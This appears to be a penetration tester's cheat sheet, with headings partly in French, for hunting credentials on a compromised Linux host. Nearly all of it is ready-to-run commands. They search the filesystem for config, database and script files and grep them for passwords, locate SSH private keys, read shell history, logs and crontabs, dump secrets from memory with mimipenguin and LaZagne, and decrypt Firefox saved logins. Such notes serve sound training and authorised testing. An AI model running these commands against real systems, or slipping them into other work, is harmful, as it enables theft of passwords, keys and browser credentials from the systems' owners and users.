Credential Hunting
# Files / Configs
## Affiche tous les fichiers de configuration trouvés
for l in $(echo ".conf .config .cnf");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "lib\|fonts\|share\|core" ;done
## Affiche dans les fichiers précédents les lignes contenant des mots clés intéressants
for i in $(find / -name *.cnf 2>/dev/null | grep -v "doc\|lib");do echo -e "\nFile: " $i; grep "user\|password\|pass" $i 2>/dev/null | grep -v "\#";done
# Files / Databases
for l in $(echo ".sql .db .*db .db*");do echo -e "\nDB File extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man";done
# Files / Notes
find /home/* -type f -name "*.txt" -o ! -name "*.*"
# Files / Scripts
for l in $(echo ".py .pyc .pl .go .jar .c .sh");do echo -e "\nFile extension: " $l; find / -name *$l 2>/dev/null | grep -v "doc\|lib\|headers\|share";done
# Files / Source codes
# Files / Cronjobs
cat /etc/crontab
ls -la /etc/cron.*/
# Files / SSH Keys
## Clés privées
grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1"
## Clés publiques
grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1"
# History / Logs
tail -n5 /home/*/.bash*
# History / Command-line History
for i in $(ls /var/log/* 2>/dev/null);do GREP=$(grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null); if [[ $GREP ]];then echo -e "\n#### Log file: " $i; grep "accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND\=\|logs" $i 2>/dev/null;fi;done
# Memory / Cache
sudo python3 mimipenguin.py
sudo bash mimipenguin.sh
sudo python2.7 laZagne.py all
# Memory / In-memory Processing
# Key-Rings / Browser stored credentials
ls -l .mozilla/firefox/ | grep default
cat .mozilla/firefox/1bplpd86.default-release/logins.json | jq .
python3.9 firefox_decrypt.py # https://github.com/unode/firefox_decrypt